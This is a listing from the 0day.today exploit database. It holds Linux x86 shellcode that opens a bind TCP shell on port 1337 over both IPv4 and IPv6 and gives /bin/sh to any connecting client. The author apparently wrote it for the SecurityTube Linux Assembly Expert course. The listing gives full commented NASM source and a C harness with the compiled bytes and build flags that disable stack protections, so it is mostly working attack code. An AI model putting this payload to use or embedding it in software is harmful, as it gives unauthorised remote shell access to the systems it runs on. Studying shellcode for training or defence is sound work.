0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
/* # Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode # Shellcode Author: Kevin Kirsche # Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell # Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2 # This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE-1134 Compilation instructions: gcc -o shellcode shellcode.c -fno-stack-protector -z execstack Commented NASM: global _start section .text _start: ; socket ;; cleanup xor ebx, ebx ;; arguments push ebx ; #define IP_PROTO 0 push 0x1 ; #define SOCK_STREAM 1 push 0xa ; #define PF_INET6 10 ;; function mov ecx, esp ; pointer to args on the stack into ecx push 0x66 pop eax ; socketcall 0x66 == 102 inc ebx ; #define SYS_SOCKET 1 ;; call int 0x80 ;; returned data xchg esi, eax ; sockfd eax -> esi ; setsocketopt ;; cleanup xor eax, eax ;; arguments push eax ; NO = 0x0 mov edx, esp ; get a pointer to the null value push 0x2 ; sizeof(NO) push edx ; pointer to NO push 0x1a ; #define IPV6_V6ONLY 26 push 0x29 ; #define IPPROTO_IPV6 ;; function mov ecx, esp ; pointer to args on the stack into ecx mov al, 0x66 ; socketcall 0x66 == 102 mov bl, 0xe ; #define SYS_SETSOCKOPT 14 ;; call int 0x80 ; bind ipv4 ;; cleanup xor edx, edx ;; v4lhost struct push edx ; #define INADDR_ANY 0 push word 0x3905 ; port 1337 in big endian format push 0x2 ; #define AF_INET 2 ;; arguments mov ecx, esp ; pointer to v4lhost struct arguments push 0x10 ; sizeof v4lhost push ecx ; pointer v4lhost push esi ; push sockfd onto stack ;; function mov ecx, esp ; argument pointer into ecx mov bl, 0x2 ; #define SYS_BIND 2 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; bind ipv6 ;; cleanup xor eax, eax ;; v6lhost struct push dword eax ; v6_host.sin6_addr push dword eax push dword eax push dword eax push dword eax push word 0x3905 ; port 1337 push word 0x0a ; PF_INET6 ;; arguments mov ecx, esp ; pointer to struct into ecx push 0x1c ; sizeof struct push ecx ; pointer to struct push esi ; sockfd ;; function mov ecx, esp ; arguments into register mov bl, 0x2 ; #define SYS_BIND 2 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; listen ;; arguments push byte 0x2 ; queuelimit = 2 push esi ; sockfd ;; function mov ecx, esp ; pointer to args into ecx mov bl, 0x4 ; #define SYS_LISTEN 4 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ; accept ;; cleanup xor ebx, ebx ;;arguments push ebx ; push NULL push ebx ; push NULL push esi ; sockfd ;; function mov ecx, esp ; pointer to args into ecx mov bl, 0x5 ; #define SYS_ACCEPT 5 mov al, 0x66 ; socketcall 0x66 == 102 ;; call int 0x80 ;; returned data xchg ebx, eax ; ebx holds the new sockfd that we accepted ; dup file descriptor ;; setup counters sub ecx, ecx ; zero out ecx mov cl, 0x2 ; create a counter ;; loop duploop: mov al, 0x3f ; SYS_DUP2 syscall int 0x80 ; call SYS_DUP2 dec ecx ; decrement loop counter jns duploop ; as long as SF is not set, keep looping ; execve ;; cleanup xor edx, edx ;; command to run push edx ; NULL string terminator push 0x68732f2f ; hs// push 0x6e69622f ; nib/ ;; arguments mov ebx, esp ; pointer to args into ebx push edx ; null ARGV push ebx ; command to run ;; function mov ecx, esp mov al, 0x0b ; execve systemcall int 0x80 */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43" "\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0" "\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10" "\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66" "\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66" "\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56" "\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49" "\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" "\x53\x89\xe1\xb0\x0b\xcd\x80"; int main() { // pollute the registers asm("mov $0x78975432, %eax\n\t" "mov $0x17645589, %ecx\n\t" "mov $0x23149875, %edx\n\t"); // begin shellcode printf("Shellcode Length: %d\n", strlen(code)); // execute our shellcode int (*ret)() = (int(*)())code; ret(); } # 0day.today [2024-09-28] #